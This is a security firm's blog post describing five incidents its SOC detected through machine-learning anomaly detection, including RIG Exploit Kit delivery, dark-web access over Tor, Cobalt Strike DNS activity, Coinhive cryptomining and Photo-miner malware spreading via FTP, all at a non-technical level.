Discoveries made by the Cyberseer SOC

Published: 8th July

RIG Exploit Kit (RigEK)

Industry Sector: Financial
Threat source: External

Cyberseer utilises machine learning models to detect a device behaving abnormally. Analysts monitoring for this activity discovered a corporate device beaconing to a newly generated domain. The suspect device was being redirected from a trusted domain to a malicious domain ‘kw9vf.ugdfftp [.] top’, which was hosting a malicious flash executable. Machine learning identified it was abnormal for this device to be redirected from other sites and also to download flash executables.

Being quickly alerted to this activity, the analyst carried out an in-depth analysis of the network traffic, the executable and timeline which then identified the infamous RIG Exploit Kit in the payload which is known to distribute an array of malicious software such as Worms, RAT’s (Remote Access Tools) and Ransomware.

Machine learning is always up to date!

Exploit Kits bundle known vulnerability exploits together so that an attacker has multiple paths to achieve their goal; these commonly include operating system vulnerabilities and applications, with Flash player being a high-risk target as it is often left in an outdated state. In this case, the user had been redirected from a legitimate looking site; luring the user that the download was legitimate.

In this incident, the download was not stopped by the organisation’s web security gateway, showing the clear advantage of machine learning compared to static rules and signatures. Cyberseer promptly identified and reported this incident to the customer and with a built timeline of events could quickly identify any other devices which could be affected.

See how we ustilse machine learning here >>

Shedding light onto ‘dark web’ marketplace access:

Industry Sector: Retail
Threat Source: Internal

Using Tor within an enterprise straight away raises suspicious, furthermore can increase security risk by making a device more exposed to malicious sites. While Tor does provide anonymity for the user, the purpose of this software is to obscure the user’s communications by distributing it through multiple network nodes thus resulting in heightened amounts of traffic to obscure destinations.

As a result, Tor outbound traffic becomes obvious to an analyst when looking for known indicators, such as onion domains, ports used and certificates.

When Cyberseer analysts detected a corporate device making use of the Tor network this can an indication of a user or malicious software attempting to obfuscate the destination. In this example, Cyberseer observed onion domains present in the web traffic.

Quick detection, quick investigation, quick response!

Analysts identified the purpose of the destination onion site was to access ‘dark web’ online market stores where users could buy and sell information. that the actor then used to sell stolen PII (Personal Identifiable) data.

Cyberseer analysts could also correlate this malicious activity by observing abnormal amounts of data being sent to known Tor infrastructure. With high confidence of malicious activity, Cyberseer can then alert the customer immediately and provided a comprehensive report which enabled them to contain and inspect the user and device involved.

Usage of Cobalt Strike – Fighting back!

Industry Sector: Financial
Threat Source: Internal

Cyberseer utilise tools which machine learning profiles of the devices on the network by observing their characteristics and normal behaviours. When a ‘rogue’ device/s gets added to the network, it will not conform these normal behaviours making it easier to spot. In this case, the analysts were instantly alerted to a device generating abnormal network traffic.

The device was seen making a large volume of unusual DNS requests to domains that are associated with the security assessment tool “Cobalt Strike”. Cyberseer could then formulate a timeline of how and when the anomalous activity started.

Cobalt Strike’s primary usage is to simulate adversary and ‘Red Team’ operations. The software is able to simulate the methods and tactics used by a threat actor to laterally move through a network. One of Cobalt Strikes features is the ability to communicate through the DNS protocol which remains unfiltered on the vast majority of corporate networks.

Unlike other toolsets, Cobalt strike can also use a vast array of techniques to emulate post-exploitation actions in conjunction with other tools such as Metasploit. On identification of the tool, immediately identified helping the customer to stop the tool in its tracks.

When investigating this incident, Cyberseer was able to identify the key execution characteristics of the data exfiltration, log collection and enumeration through identifying key changes in the network traffic. As soon as the threat was noticed, analysts could convey the severity of this threat to the customer.

Cryptomining ‘Monero’

Industry Sector: Financial
Threat Source: External

Coinhive was a cryptocurrency mining service that enables website owners to profit from their visitors. This was achieved by embedding scripts into a webpage that then instruct the browsers to execute scripts which can start the ‘cryptomining’ process.

Due to the computation power required to mine, the performance of the victim’s device can be severely impacted, despite the fact most victims often only mine a piece of the cryptocurrency. Attackers also see the opportunity to compromise a legitimate website where resulting in an unsuspecting user unknowingly contributing to the mining process.

Cyberseer analysts leverage various tools that identify rarity and anomalous characteristics within network traffic. Together with custom models, an analyst discovered a corporate device deviating from its normal behavioural pattern as it was seen making an unusual volume of external connections to a retail site.

Making use of various intel sources, the analyst was able to determine that the website had been compromised to mine the ‘Monero’ cryptocurrency. When discovered, the customer was notified of the activity and was provided with a detailed report which advised the implementation of stricter web controls of endpoints on the network, ensuring users were unable to visit the site; stopping any future infection.

Photo-miner Malware

Industry sector: Financial
Threat source: External

Photo-miner is a complex example of a piece of malware which can use multiple methods to propagate from device to device. The initial infection is downloaded, commonly through a compromised FTP server where the attacker has previously been able to upload malicious files. The malware then takes two routes to propagate; attacking FTP servers from the affected machine and also attempting to propagate on the local network of the compromised machine.

Why FTP? FTP not being a secure protocol using unencrypted methods to transmit username and passwords combined with weak security implementation, such as a simple password and unlimited login attempts.

The Cyberseer SOC mindset

When a user navigated to one of these sites, Cyberseer analysts immediately questioned why the user would need to be using this insecure protocol? After digging deeper, an analyst determined the FTP site had an obscure domain and that it was the first time this domain had been accessed within the organisation. 

This was made possible down to machine learning keeping a baseline not only of that device but also for the organisation. Using this information, analysts classified objects on the site to be related to the photo-miner malware.

With an accurate classification, the analyst could then use open source intelligence to identify the methods this malware uses to propagate to other internal devices to determine if were being observed.

Furthermore, Cyberseer used this information to create meta models and raise the severity pertaining to any usage of the legacy FTP protocol.

Latest blogs

Discoveries made by the Cyberseer SOC​

Why is visibility so important in today’s new norm of remote working.

What are Cloud Security and Posture Management tools?

Securing the Cloud Infrastructure: Native vs Cloud Control

Google Chronicle: The forward-thinking solution for threat hunting